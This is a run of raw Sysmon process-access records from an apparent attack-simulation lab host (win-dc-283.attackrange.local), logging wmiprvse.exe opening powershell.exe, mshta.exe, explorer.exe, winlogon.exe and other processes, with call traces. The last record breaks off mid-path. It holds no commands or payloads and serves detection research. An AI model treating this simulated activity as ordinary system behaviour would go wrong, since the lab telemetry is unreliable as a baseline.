15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.772{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 